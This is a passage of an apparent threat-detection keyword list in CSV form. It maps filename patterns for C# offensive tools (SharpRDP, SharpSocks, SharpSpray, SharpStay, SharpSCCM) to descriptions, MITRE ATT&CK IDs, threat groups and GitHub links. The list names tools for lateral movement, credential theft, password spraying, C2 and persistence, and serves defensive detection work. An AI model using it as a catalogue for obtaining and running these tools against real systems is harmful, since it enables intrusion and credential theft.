Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,1,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*SharpRDP.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpRDP.exe*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,1,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*SharpRDP.sln*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,1,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*SharpRDPHijack.cs*,offensive_tool_keyword,SharpRDPHijack,SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions,T1021.001 - T1078.003 - T1059.001,TA0002 - TA0008 - TA0006,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/bohops/SharpRDPHijack,1,1,N/A,10,4,382,84,2021-07-25T17:36:01Z,2020-07-06T02:59:46Z -*SharpRDPHijack.exe*,offensive_tool_keyword,SharpRDPHijack,SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions,T1021.001 - T1078.003 - T1059.001,TA0002 - TA0008 - TA0006,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/bohops/SharpRDPHijack,1,1,N/A,10,4,382,84,2021-07-25T17:36:01Z,2020-07-06T02:59:46Z -*SharpRDPHijack-master*,offensive_tool_keyword,SharpRDPHijack,SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions,T1021.001 - T1078.003 - T1059.001,TA0002 - TA0008 - TA0006,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/bohops/SharpRDPHijack,1,1,N/A,10,4,382,84,2021-07-25T17:36:01Z,2020-07-06T02:59:46Z -*SharpRDP-master*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,1,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*Sharpreflect *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*SharpReg.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpRoast.exe*,offensive_tool_keyword,Ghostpack-CompiledBinaries,Compiled Binaries for Ghostpack,T1140 - T1559.002 - T1547.002 - T1055 - T1036.004,TA0005 - TA0002 - TA0040 - TA0036,N/A,N/A,Exploitation Tools,https://github.com/r3motecontrol/Ghostpack-CompiledBinaries,1,1,N/A,N/A,9,855,177,2022-11-08T02:58:06Z,2018-07-25T23:38:15Z -*sharpsc *cmd*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpSCCM*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,1,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -*SharpSCCM.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpSCShell*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*SharpSearch.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpSecDump.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*sharpsecretsdump*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*SharpShares.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpShellPipe.exe*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,1,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*SharpShellPipe.sln*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,1,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*SharpShellPipe-main*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,1,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*SharpShooter*,offensive_tool_keyword,SharpShooter,Payload Generation Framework,T1027 - T1564 - T1204 - T1059 - T1105,TA0002 - TA0011 - TA0008,N/A,N/A,Frameworks,https://github.com/mdsecactivebreach/SharpShooter,1,1,N/A,N/A,10,1681,352,2022-03-16T15:36:54Z,2018-03-06T20:04:20Z -*SharpShot.exe /*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*Sharp-SMBExec.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpSniper.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpSocks.exe*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*SharpSocks.pfx*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*SharpSocks.resx*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*SharpSocks.sln*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*SharpSocksCommon*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*SharpSocksConfig*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*SharpSocksImplant*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*SharpSocksServer*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*SharpSpawner.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpSphere.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpSploit*,offensive_tool_keyword,SharpSploit,SharpSploitis a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.,T1055 - T1059 - T1027 - T1505,TA0002 - TA0003 - TA0008 - TA0040,N/A,N/A,Exploitation tools,https://github.com/cobbr/SharpSploit,1,1,N/A,N/A,10,1632,321,2021-08-12T18:23:15Z,2018-09-20T14:22:37Z -*SharpSploit.dll*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*SharpSploitConsole_x*,offensive_tool_keyword,cobaltstrike,SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/SharpCradle,1,1,N/A,10,10,275,59,2020-12-30T17:15:51Z,2018-10-23T06:21:53Z -*SharpSploitDomainRecon*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpSploitDomainReconImpl*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpSplunkWhisperer2*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*SharpSpoolTrigger.exe*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*SharpSpray*,offensive_tool_keyword,SharpSpray,This project is a C# port of my PowerSpray.ps1 script. SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.,T1110 - T1558,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/jnqpblc/SharpSpray,1,1,N/A,N/A,2,176,36,2019-06-30T03:10:52Z,2019-03-04T17:14:07Z -*SharpSpray.exe *,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,0,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*SharpSpray.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpSQLPwn*,offensive_tool_keyword,SharpSQLPwn,C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/lefayjey/SharpSQLPwn,1,1,N/A,N/A,1,74,15,2022-02-13T19:15:36Z,2022-01-20T19:58:07Z -*SharpSQLPwn.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpStay.csproj*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,1,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*Sharpstay.exe *,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*SharpStay.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,1,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*SharpStay.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpStay.sln*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,1,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*SharpStay-master*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,1,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*Sharp-Suite.git*,offensive_tool_keyword,Sharp-Suite,C# offensive tools,T1027 - T1059.001 - T1562.001 - T1136.001,TA0004 - TA0005 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*SharpSvc.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpSword.csproj*,offensive_tool_keyword,SharpSword,Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly,T1562.004 - T1059.001 - T1021.003,TA0005 - TA0002,N/A,N/A,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,8,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z 